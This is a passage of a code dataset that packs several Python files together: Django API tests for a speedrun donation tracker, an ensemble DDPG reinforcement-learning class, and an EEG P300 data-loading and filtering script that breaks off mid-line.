t[i][2][1])\r\nDrawScoreboard(t)\r\n\r\ndone()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"37437917","text":"import datetime\nimport json\nimport random\n\nimport pytz\nfrom django.conf import settings\nfrom django.contrib.admin.models import (\n LogEntry,\n ADDITION as LogEntryADDITION,\n CHANGE as LogEntryCHANGE,\n DELETION as LogEntryDELETION,\n)\nfrom django.contrib.auth.models import User, Permission, AnonymousUser\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core import serializers\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.test import TransactionTestCase, RequestFactory, override_settings\nfrom django.urls import reverse\n\nimport tracker.models as models\nimport tracker.randgen as randgen\nimport tracker.views.api\n\nnoon = datetime.time(12, 0)\ntoday = datetime.date.today()\ntoday_noon = datetime.datetime.combine(today, noon)\ntomorrow = today + datetime.timedelta(days=1)\ntomorrow_noon = datetime.datetime.combine(tomorrow, noon)\nlong_ago = today - datetime.timedelta(days=180)\nlong_ago_noon = datetime.datetime.combine(long_ago, noon)\n\n\ndef format_time(dt):\n return dt.astimezone(pytz.utc).isoformat()[:-6] + 'Z'\n\n\nclass APITestCase(TransactionTestCase):\n model_name = None\n encoder = DjangoJSONEncoder()\n\n def parseJSON(self, response, status_code=200):\n self.assertEqual(\n response.status_code,\n status_code,\n msg='Status code is not %d\\n\"\"\"%s\"\"\"' % (status_code, response.content),\n )\n try:\n return json.loads(response.content)\n except Exception as e:\n raise AssertionError(\n 'Could not parse json: %s\\n\"\"\"%s\"\"\"' % (e, response.content)\n )\n\n def assertModelPresent(self, expected_model, data):\n found_model = None\n for model in data:\n if (\n model['pk'] == expected_model['pk']\n and model['model'] == expected_model['model']\n ):\n found_model = model\n break\n if not found_model:\n raise AssertionError(\n 'Could not find model \"%s:%s\" in data'\n % (expected_model['model'], expected_model['pk'])\n )\n extra_keys = set(found_model['fields'].keys()) - set(\n expected_model['fields'].keys()\n )\n missing_keys = set(expected_model['fields'].keys()) - set(\n found_model['fields'].keys()\n )\n unequal_keys = [\n k\n for k in list(expected_model['fields'].keys())\n if k in found_model['fields']\n and found_model['fields'][k] != expected_model['fields'][k]\n ]\n problems = (\n ['Extra key: \"%s\"' % k for k in extra_keys]\n + ['Missing key: \"%s\"' % k for k in missing_keys]\n + [\n 'Value for key \"%s\" unequal: %r != %r'\n % (k, expected_model['fields'][k], found_model['fields'][k])\n for k in unequal_keys\n ]\n )\n if problems:\n raise AssertionError(\n 'Model \"%s:%s\" was incorrect:\\n%s'\n % (expected_model['model'], expected_model['pk'], '\\n'.join(problems))\n )\n\n def assertModelNotPresent(self, unexpected_model, data):\n found_model = None\n for model in data:\n if (\n model['pk'] == unexpected_model['pk']\n and model['model'] == unexpected_model['model']\n ):\n found_model = model\n break\n if not found_model:\n raise AssertionError(\n 'Found model \"%s:%s\" in data'\n % (unexpected_model['model'], unexpected_model['pk'])\n )\n\n def setUp(self):\n self.factory = RequestFactory()\n self.locked_event = models.Event.objects.create(\n datetime=long_ago_noon, targetamount=5, short='locked', name='Locked Event'\n )\n self.event = models.Event.objects.create(\n datetime=today_noon, targetamount=5, short='event', name='Test Event'\n )\n self.anonymous_user = AnonymousUser()\n self.user = User.objects.create(username='test')\n self.add_user = User.objects.create(username='add')\n self.locked_user = User.objects.create(username='locked')\n self.locked_user.user_permissions.add(\n Permission.objects.get(name='Can edit locked events')\n )\n if self.model_name:\n self.add_user.user_permissions.add(\n Permission.objects.get(name='Can add %s' % self.model_name),\n Permission.objects.get(name='Can change %s' % self.model_name),\n )\n self.locked_user.user_permissions.add(\n Permission.objects.get(name='Can add %s' % self.model_name),\n Permission.objects.get(name='Can change %s' % self.model_name),\n )\n self.super_user = User.objects.create(username='super', is_superuser=True)\n self.maxDiff = None\n\n\nclass TestGeneric(APITestCase):\n \"\"\"generic cases that could apply to any class, even if they use a specific one for testing purposes\"\"\"\n\n def test_add_with_bad_type(self):\n request = self.factory.post('/api/v1/add', dict(type='nonsense'))\n request.user = self.super_user\n data = self.parseJSON(tracker.views.api.add(request), status_code=400)\n self.assertEqual('Malformed Parameters', data['error'])\n\n def test_add_with_bad_field(self):\n request = self.factory.post(\n '/api/v1/add', dict(type='run', nonsense='nonsense')\n )\n request.user = self.super_user\n data = self.parseJSON(tracker.views.api.add(request), status_code=400)\n self.assertEqual('Field does not exist', data['error'])\n\n @override_settings(TRACKER_PAGINATION_LIMIT=20)\n def test_search_with_offset_and_limit(self):\n rand = random.Random()\n event = randgen.generate_event(rand, today_noon)\n event.save()\n randgen.generate_runs(rand, event, 5)\n randgen.generate_donations(rand, event, 50, transactionstate='COMPLETED')\n request = self.factory.get(\n '/api/v1/search', dict(type='donation', offset=10, limit=10),\n )\n request.user = self.anonymous_user\n data = self.parseJSON(tracker.views.api.search(request))\n donations = models.Donation.objects.all()\n self.assertEqual(len(data), 10)\n self.assertListEqual([d['pk'] for d in data], [d.id for d in donations[10:20]])\n\n request = self.factory.get('/api/v1/search', dict(type='donation', limit=30),)\n request.user = self.anonymous_user\n data = self.parseJSON(tracker.views.api.search(request))\n # settings wins if too many are requested\n self.assertEqual(len(data), settings.TRACKER_PAGINATION_LIMIT)\n\n def test_add_log(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(type='runner', name='trihex', stream='https://twitch.tv/trihex'),\n )\n request.user = self.super_user\n data = self.parseJSON(tracker.views.api.add(request))\n runner = models.Runner.objects.get(pk=data[0]['pk'])\n add_entry = LogEntry.objects.order_by('-pk')[1]\n self.assertEqual(int(add_entry.object_id), runner.id)\n self.assertEqual(\n add_entry.content_type, ContentType.objects.get_for_model(models.Runner)\n )\n self.assertEqual(add_entry.action_flag, LogEntryADDITION)\n change_entry = LogEntry.objects.order_by('-pk')[0]\n self.assertEqual(int(change_entry.object_id), runner.id)\n self.assertEqual(\n change_entry.content_type, ContentType.objects.get_for_model(models.Runner)\n )\n self.assertEqual(change_entry.action_flag, LogEntryCHANGE)\n self.assertIn('Set name to \"%s\".' % runner.name, change_entry.change_message)\n self.assertIn(\n 'Set stream to \"%s\".' % runner.stream, change_entry.change_message\n )\n\n def test_change_log(self):\n old_runner = models.Runner.objects.create(name='PJ', youtube='TheSuperSNES')\n request = self.factory.post(\n '/api/v1/edit',\n dict(\n type='runner',\n id=old_runner.id,\n name='trihex',\n stream='https://twitch.tv/trihex',\n youtube='',\n ),\n )\n request.user = self.super_user\n data = self.parseJSON(tracker.views.api.edit(request))\n runner = models.Runner.objects.get(pk=data[0]['pk'])\n entry = LogEntry.objects.order_by('pk').last()\n self.assertEqual(int(entry.object_id), runner.id)\n self.assertEqual(\n entry.content_type, ContentType.objects.get_for_model(models.Runner)\n )\n self.assertEqual(entry.action_flag, LogEntryCHANGE)\n self.assertIn(\n 'Changed name from \"%s\" to \"%s\".' % (old_runner.name, runner.name),\n entry.change_message,\n )\n self.assertIn(\n 'Changed stream from empty to \"%s\".' % runner.stream, entry.change_message\n )\n self.assertIn(\n 'Changed youtube from \"%s\" to empty.' % old_runner.youtube,\n entry.change_message,\n )\n\n def test_change_log_m2m(self):\n run = models.SpeedRun.objects.create(name='Test Run', run_time='0:15:00')\n runner1 = models.Runner.objects.create(name='PJ')\n runner2 = models.Runner.objects.create(name='trihex')\n request = self.factory.post(\n '/api/v1/edit',\n dict(type='run', id=run.id, runners='%s,%s' % (runner1.name, runner2.name)),\n )\n request.user = self.super_user\n self.parseJSON(tracker.views.api.edit(request))\n entry = LogEntry.objects.order_by('pk').last()\n self.assertEqual(int(entry.object_id), run.id)\n self.assertEqual(\n entry.content_type, ContentType.objects.get_for_model(models.SpeedRun)\n )\n self.assertEqual(entry.action_flag, LogEntryCHANGE)\n self.assertIn(\n 'Changed runners from empty to \"%s\".' % ([str(runner1), str(runner2)],),\n entry.change_message,\n )\n\n def test_delete_log(self):\n old_runner = models.Runner.objects.create(name='PJ', youtube='TheSuperSNES')\n request = self.factory.post(\n '/api/v1/delete', dict(type='runner', id=old_runner.id)\n )\n request.user = self.super_user\n self.parseJSON(tracker.views.api.delete(request))\n self.assertFalse(models.Runner.objects.filter(pk=old_runner.pk).exists())\n entry = LogEntry.objects.order_by('pk').last()\n self.assertEqual(int(entry.object_id), old_runner.id)\n self.assertEqual(\n entry.content_type, ContentType.objects.get_for_model(models.Runner)\n )\n self.assertEqual(entry.action_flag, LogEntryDELETION)\n\n\nclass TestSpeedRun(APITestCase):\n model_name = 'Speed Run'\n\n def setUp(self):\n super(TestSpeedRun, self).setUp()\n self.run1 = models.SpeedRun.objects.create(\n name='Test Run',\n category='test%',\n giantbomb_id=0x5EADBEEF,\n console='NES',\n run_time='0:45:00',\n setup_time='0:05:00',\n release_year=1988,\n description='Foo',\n commentators='blechy',\n order=1,\n tech_notes='This run requires an LCD with 0.58ms of lag for a skip late in the game',\n coop=True,\n )\n self.run2 = models.SpeedRun.objects.create(\n name='Test Run 2', run_time='0:15:00', setup_time='0:05:00', order=2\n )\n self.run3 = models.SpeedRun.objects.create(\n name='Test Run 3', run_time='0:20:00', setup_time='0:05:00', order=None\n )\n self.run4 = models.SpeedRun.objects.create(\n name='Test Run 4', run_time='0:05:00', setup_time='0', order=3\n )\n self.runner1 = models.Runner.objects.create(name='trihex')\n self.runner2 = models.Runner.objects.create(name='PJ')\n self.run1.runners.add(self.runner1)\n self.event2 = models.Event.objects.create(\n datetime=tomorrow_noon, targetamount=5, short='event2',\n )\n self.run5 = models.SpeedRun.objects.create(\n name='Test Run 5',\n run_time='0:05:00',\n setup_time='0',\n order=1,\n event=self.event2,\n )\n\n @classmethod\n def format_run(cls, run):\n return dict(\n fields=dict(\n canonical_url=(\n 'http://testserver' + reverse('tracker:run', args=(run.id,))\n ),\n category=run.category,\n commentators=run.commentators,\n console=run.console,\n coop=run.coop,\n deprecated_runners=run.deprecated_runners,\n description=run.description,\n display_name=run.display_name,\n endtime=format_time(run.endtime) if run.endtime else run.endtime,\n event=run.event.id,\n giantbomb_id=run.giantbomb_id,\n name=run.name,\n order=run.order,\n public=str(run),\n release_year=run.release_year,\n run_time=run.run_time,\n runners=[runner.id for runner in run.runners.all()],\n setup_time=run.setup_time,\n starttime=format_time(run.starttime)\n if run.starttime\n else run.starttime,\n twitch_name=run.twitch_name,\n ),\n model='tracker.speedrun',\n pk=run.id,\n )\n\n def test_get_single_run(self):\n request = self.factory.get('/api/v1/search', dict(type='run', id=self.run1.id))\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 1)\n expected = self.format_run(self.run1)\n self.assertEqual(data[0], expected)\n\n def test_get_event_runs(self):\n request = self.factory.get(\n '/api/v1/search', dict(type='run', event=self.run1.event_id)\n )\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 4)\n self.assertModelPresent(self.format_run(self.run1), data)\n self.assertModelPresent(self.format_run(self.run2), data)\n self.assertModelPresent(self.format_run(self.run3), data)\n self.assertModelPresent(self.format_run(self.run4), data)\n\n def test_get_starttime_lte(self):\n request = self.factory.get(\n '/api/v1/search',\n dict(type='run', starttime_lte=format_time(self.run2.starttime)),\n )\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 2)\n self.assertModelPresent(self.format_run(self.run1), data)\n self.assertModelPresent(self.format_run(self.run2), data)\n\n def test_get_starttime_gte(self):\n request = self.factory.get(\n '/api/v1/search',\n dict(type='run', starttime_gte=format_time(self.run2.starttime)),\n )\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 3)\n self.assertModelPresent(self.format_run(self.run2), data)\n self.assertModelPresent(self.format_run(self.run4), data)\n self.assertModelPresent(self.format_run(self.run5), data)\n\n def test_get_endtime_lte(self):\n request = self.factory.get(\n '/api/v1/search',\n dict(type='run', endtime_lte=format_time(self.run2.endtime)),\n )\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 2)\n self.assertModelPresent(self.format_run(self.run1), data)\n self.assertModelPresent(self.format_run(self.run2), data)\n\n def test_get_endtime_gte(self):\n request = self.factory.get(\n '/api/v1/search',\n dict(type='run', endtime_gte=format_time(self.run2.endtime)),\n )\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 3)\n self.assertModelPresent(self.format_run(self.run2), data)\n self.assertModelPresent(self.format_run(self.run4), data)\n self.assertModelPresent(self.format_run(self.run5), data)\n\n def test_add_with_category(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='run',\n name='Added Run With Category',\n run_time='0:15:00',\n setup_time='0:05:00',\n category='100%',\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request))\n self.assertEqual(len(data), 1)\n self.assertEqual(models.SpeedRun.objects.get(pk=data[0]['pk']).category, '100%')\n\n def test_edit_with_category(self):\n request = self.factory.post(\n '/api/v1/edit', dict(type='run', id=self.run2.id, category='100%')\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.edit(request))\n self.assertEqual(len(data), 1)\n self.assertEqual(models.SpeedRun.objects.get(pk=data[0]['pk']).category, '100%')\n\n def test_add_with_runners_as_ids(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='run',\n name='Added Run With Runners',\n runners='%d,%d' % (self.runner1.id, self.runner2.id),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_add_with_runners_as_invalid_ids(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='run',\n name='Added Run With Runners',\n runners='%d,%d' % (self.runner1.id, 6666),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request), status_code=400)\n self.assertEqual('Foreign Key relation could not be found', data['error'])\n\n def test_add_with_runners_as_json_ids(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='run',\n name='Added Run With Runners',\n runners=json.dumps([self.runner1.id, self.runner2.id]),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_add_with_runners_as_names(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='run',\n name='Added Run With Runners',\n runners='%s,%s'\n % (self.runner1.name.upper(), self.runner2.name.lower()),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_add_with_runners_as_json_names(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='run',\n name='Added Run With Runners',\n runners=json.dumps(\n [self.runner1.name.upper(), self.runner2.name.lower()]\n ),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_add_with_runners_as_json_natural_keys(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='run',\n name='Added Run With Runners',\n runners=json.dumps(\n [self.runner1.natural_key(), self.runner2.natural_key()]\n ),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_add_with_runners_as_names_invalid(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='run',\n name='Added Run With Runners',\n runners='%s,%s' % (self.runner1.name, 'nonsense'),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request), status_code=400)\n self.assertEqual('Foreign Key relation could not be found', data['error'])\n\n def test_edit_with_runners_as_ids(self):\n request = self.factory.post(\n '/api/v1/edit',\n dict(\n type='run',\n id=self.run2.id,\n runners='%d,%d' % (self.runner1.id, self.runner2.id),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.edit(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_edit_with_runners_as_json_ids(self):\n request = self.factory.post(\n '/api/v1/edit',\n dict(\n type='run',\n id=self.run2.id,\n runners=json.dumps([self.runner1.id, self.runner2.id]),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.edit(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_edit_with_runners_as_ids_invalid(self):\n request = self.factory.post(\n '/api/v1/edit',\n dict(\n type='run', id=self.run2.id, runners='%d,%d' % (self.runner1.id, 6666)\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.edit(request), status_code=400)\n self.assertEqual('Foreign Key relation could not be found', data['error'])\n\n def test_edit_with_runners_as_names(self):\n request = self.factory.post(\n '/api/v1/edit',\n dict(\n type='run',\n id=self.run2.id,\n runners='%s,%s'\n % (self.runner1.name.upper(), self.runner2.name.lower()),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.edit(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_edit_with_runners_as_json_names(self):\n request = self.factory.post(\n '/api/v1/edit',\n dict(\n type='run',\n id=self.run2.id,\n runners=json.dumps(\n [self.runner1.name.upper(), self.runner2.name.lower()]\n ),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.edit(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_edit_with_runners_as_json_natural_keys(self):\n request = self.factory.post(\n '/api/v1/edit',\n dict(\n type='run',\n id=self.run2.id,\n runners=json.dumps(\n [self.runner1.natural_key(), self.runner2.natural_key()]\n ),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.edit(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_edit_with_runners_as_names_invalid(self):\n request = self.factory.post(\n '/api/v1/edit',\n dict(\n type='run',\n id=self.run2.id,\n runners='%s,%s' % (self.runner1.name, 'nonsense'),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.edit(request), status_code=400)\n self.assertEqual('Foreign Key relation could not be found', data['error'])\n\n def test_tech_notes(self):\n request = self.factory.get('/api/v1/search', dict(type='run', id=self.run1.id))\n request.user = self.user\n self.user.user_permissions.add(\n Permission.objects.get(name='Can view tech notes')\n )\n data = self.parseJSON(tracker.views.api.search(request))\n expected = self.format_run(self.run1)\n expected['fields']['tech_notes'] = self.run1.tech_notes\n self.assertEqual(data[0], expected)\n\n\nclass TestRunner(APITestCase):\n model_name = 'runner'\n\n def setUp(self):\n super(TestRunner, self).setUp()\n self.runner = models.Runner.objects.create(name='lower')\n\n @classmethod\n def format_runner(cls, runner):\n return dict(\n fields=dict(\n donor=runner.donor.visible_name() if runner.donor else None,\n public=runner.name,\n name=runner.name,\n stream=runner.stream,\n twitter=runner.twitter,\n youtube=runner.youtube,\n platform=runner.platform,\n pronouns=runner.pronouns,\n ),\n model='tracker.runner',\n pk=runner.id,\n )\n\n def test_name_case_insensitive_search(self):\n request = self.factory.get(\n '/api/v1/search', dict(type='runner', name=self.runner.name.upper())\n )\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n expected = self.format_runner(self.runner)\n self.assertEqual(data[0], expected)\n\n def test_name_case_insensitive_add(self):\n request = self.factory.get(\n '/api/v1/add', dict(type='runner', name=self.runner.name.upper())\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request), status_code=400)\n self.assertRegexpMatches(\n data['messages'][0], 'case-insensitive.*already exists'\n )\n\n\nclass TestPrize(APITestCase):\n model_name = 'prize'\n\n def setUp(self):\n super(TestPrize, self).setUp()\n\n @classmethod\n def format_prize(cls, prize):\n def add_run_fields(fields, run, prefix):\n dumped_run = json.loads(serializers.serialize('json', [run]))[0]\n for key, value in dumped_run['fields'].items():\n if key in ['event', 'giantbomb_id', 'runners']:\n continue\n fields[prefix + '__' + key] = value\n fields[prefix + '__public'] = str(run)\n\n run_fields = {}\n if prize.startrun:\n add_run_fields(run_fields, prize.startrun, 'startrun')\n add_run_fields(run_fields, prize.endrun, 'endrun')\n draw_time_fields = {}\n if prize.has_draw_time():\n draw_time_fields['start_draw_time'] = cls.encoder.default(\n prize.start_draw_time()\n )\n draw_time_fields['end_draw_time'] = cls.encoder.default(\n prize.end_draw_time()\n )\n\n return dict(\n fields=dict(\n allowed_prize_countries=[\n c.id for c in prize.allowed_prize_countries.all()\n ],\n disallowed_prize_regions=[\n r.id for r in prize.disallowed_prize_regions.all()\n ],\n public=prize.name,\n name=prize.name,\n canonical_url=(\n 'http://testserver' + reverse('tracker:prize', args=(prize.id,))\n ),\n category=prize.category_id,\n image=prize.image,\n altimage=prize.altimage,\n imagefile=prize.imagefile.url if prize.imagefile else '',\n description=prize.description,\n shortdescription=prize.shortdescription,\n creator=prize.creator,\n creatoremail=prize.creatoremail,\n creatorwebsite=prize.creatorwebsite,\n handler=prize.handler_id,\n key_code=prize.key_code,\n provider=prize.provider,\n maxmultiwin=prize.maxmultiwin,\n maxwinners=prize.maxwinners,\n numwinners=str(len(prize.get_prize_winners())),\n requiresshipping=prize.requiresshipping,\n custom_country_filter=prize.custom_country_filter,\n estimatedvalue=prize.estimatedvalue,\n minimumbid=str(prize.minimumbid),\n maximumbid=str(prize.maximumbid),\n sumdonations=prize.sumdonations,\n randomdraw=prize.randomdraw,\n event=prize.event_id,\n startrun=prize.startrun_id,\n endrun=prize.endrun_id,\n starttime=prize.starttime,\n endtime=prize.endtime,\n **run_fields,\n **draw_time_fields,\n ),\n model='tracker.prize',\n pk=prize.id,\n )\n\n def test_search(self):\n models.SpeedRun.objects.create(\n event=self.event,\n name='Test Run',\n run_time='5:00',\n setup_time='5:00',\n order=1,\n ).clean()\n prize = models.Prize.objects.create(\n event=self.event,\n handler=self.add_user,\n name='Prize With Image',\n state='ACCEPTED',\n startrun=self.event.speedrun_set.first(),\n endrun=self.event.speedrun_set.first(),\n image='https://example.com/example.jpg',\n )\n prize.refresh_from_db()\n request = self.factory.get('/api/v1/search', dict(type='prize',),)\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 1)\n self.assertEqual(data[0], self.format_prize(prize))\n\n def test_search_with_imagefile(self):\n from django.core.files.uploadedfile import SimpleUploadedFile\n\n models.SpeedRun.objects.create(\n event=self.event,\n name='Test Run',\n run_time='5:00',\n setup_time='5:00',\n order=1,\n ).clean()\n prize = models.Prize.objects.create(\n event=self.event,\n handler=self.add_user,\n name='Prize With Image',\n state='ACCEPTED',\n startrun=self.event.speedrun_set.first(),\n endrun=self.event.speedrun_set.first(),\n imagefile=SimpleUploadedFile('test.jpg', b''),\n )\n prize.refresh_from_db()\n request = self.factory.get('/api/v1/search', dict(type='prize',),)\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 1)\n self.assertEqual(data[0], self.format_prize(prize))\n\n def test_add_with_new_category(self):\n self.add_user.user_permissions.add(\n Permission.objects.get(name='Can add Prize Category')\n )\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='prize',\n name='Added Prize With Category',\n event=json.dumps(self.event.natural_key()),\n handler=json.dumps(self.add_user.natural_key()),\n category='Grand',\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request))\n prize = models.Prize.objects.get(pk=data[0]['pk'])\n self.assertEqual(len(data), 1)\n # TODO: add and search don't format the same\n # self.assertEqual(data[0], self.format_prize(prize))\n self.assertEqual(\n prize.category, models.PrizeCategory.objects.get(name='Grand'),\n )\n\n def test_add_with_new_category_without_category_add_permission(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='prize',\n name='Added Prize With Category',\n event=json.dumps(self.event.natural_key()),\n handler=json.dumps(self.add_user.natural_key()),\n category='Grand',\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request), status_code=400)\n self.assertEqual('Foreign Key relation could not be found', data['error'])\n\n\nclass TestEvent(APITestCase):\n model_name = 'event'\n\n def setUp(self):\n super(TestEvent, self).setUp()\n\n def test_event_annotations(self):\n models.Donation.objects.create(event=self.event, amount=10, domainId='123456')\n models.Donation.objects.create(\n event=self.event, amount=5, domainId='123457', transactionstate='COMPLETED'\n )\n request = self.factory.get('/api/v1/search', dict(type='event'))\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 2)\n event_data = next(e for e in data if e['pk'] == self.locked_event.id)['fields']\n self.assertEqual(event_data['amount'], '0.00')\n self.assertEqual(event_data['count'], '0')\n self.assertEqual(event_data['max'], '0.00')\n self.assertEqual(event_data['avg'], '0.0')\n event_data = next(e for e in data if e['pk'] == self.event.id)['fields']\n self.assertEqual(event_data['amount'], '5.00')\n self.assertEqual(event_data['count'], '1')\n self.assertEqual(event_data['max'], '5.00')\n self.assertEqual(event_data['avg'], '5.0')\n","sub_path":"tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":35235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"331103770","text":"import numpy as np\nfrom util import *\nfrom ddpg import DDPG\n\nclass ACE:\n def __init__(self, nb_status, nb_actions, args):\n self.ensemble = []\n self.num = args.ace\n self.iter = 0\n for i in range(self.num):\n self.ensemble.append(DDPG(nb_status, nb_actions, args))\n self.discrete = args.discrete\n\n def __call__(self, st):\n status = []\n actions = []\n tot_score = []\n for i in range(self.num):\n if i >= self.iter: break\n action = self.ensemble[i].select_action(st, return_fix=True)\n actions.append(action)\n status.append(st)\n tot_score.append(0.)\n\n for i in range(self.num):\n if i >= self.iter: break\n self.ensemble[i].eval()\n score = self.ensemble[i].critic([\n to_tensor(np.array(status), volatile=True), to_tensor(np.array(actions), volatile=True)\n ])\n for j in range(self.num):\n if j >= self.iter: break\n tot_score[j] += score.data[j][0]\n self.ensemble[i].train()\n \n best = np.array(tot_score).argmax()\n if self.discrete:\n return actions[best].argmax()\n return actions[best]\n\n def append(self, output, num):\n self.ensemble[self.iter % self.num].load_weights(output, num)\n self.iter += 1\n\n def load(self, output):\n for i in range(self.num):\n self.ensemble[i].load_weights(output)\n","sub_path":"DeepWNCS/pytorch-gym-master/ensemble/base.ensemblev2/ACE.py","file_name":"ACE.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"363210086","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\nimport numpy as np\nimport math\nfrom scipy.signal import butter, lfilter, freqz\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\ndef get_subdataset(_S, Sess):\n _file = 'P300/train/Data_S%02d_Sess%02d.csv' % (_S, Sess)\n _f = open(_file).readlines()\n channels = []\n for i, _rows in enumerate(_f):\n if i > 0:\n channels.append(eval(_rows))\n else:\n _headers = _rows\n if i > 11000:\n return np.array(channels)\n return np.array(channels)\n\n\ndef get_samples(_index, s_s_chs, sr, _size=1.3):\n return s_s_chs[_index:int(math.ceil(_index + (_size * 2*sr)))][:]\n\n\ndef get_dataset_P300():\n sr = 200\n data = []\n for subject in range(1, 27): # 1\n for session in range(1, 2): # 1\n subject_dataset = get_subdataset(subject, session)\n # first instance\n _index = [i + 1 for i, d in enumerate(subject_dataset[:, -1]) if d == 1]\n print(_index[0])\n all_channels = get_samples(_index[0], subject_dataset, sr)\n data.append(all_channels[:, 55])\n # channel O1\n return data\n\n\"\"\"\ndef butter_lowpass_filter(data, cutoff, fs, order=5):\n nyq = 0.5 * fs\n normal_cutoff = cutoff / nyq\n b, a = butter(order, normal_cutoff, btype='low', analog=False)\n y = signal.filtfilt(b, a, data)\n return y\n\n\ndef butter_highpass_filter(data, cutoff, fs, order=5):\n nyq = 0.5 * fs\n normal_cutoff = cutoff / nyq\n b, a = signal.butter(order, normal_cutoff, btype='high', analog=False)\n y = signal.filtfilt(b, a, data)\n return y\n\n\ndef butter_bandpass_filter(data, lowcut, highcut, fs, order=5):\n nyq = 0.5 * fs\n low = lowcut / nyq\n high = highcut / nyq\n b, a = butter(order, [low, high], btype='band')\n y = signal.filtfilt(b, a, data)\n return y\n\n\ndata = get_dataset()\n\nsubject1 = data[0]\nsubject2 = data[1]\nsubject3 = data[2]\n\nlp1 = butter_lowpass_filter(subject1, 50.0, 200)\nlp2 = butter_lowpass_filter(subject2, 50.0, 200)\nlp3 = butter_lowpass_filter(subject3, 50.0, 200)\n\nhp1 = butter_highpass_filter(lp1, 0.01, 200)\nhp2 = butter_highpass_filter(lp2, 0.01, 200)\nhp3 = 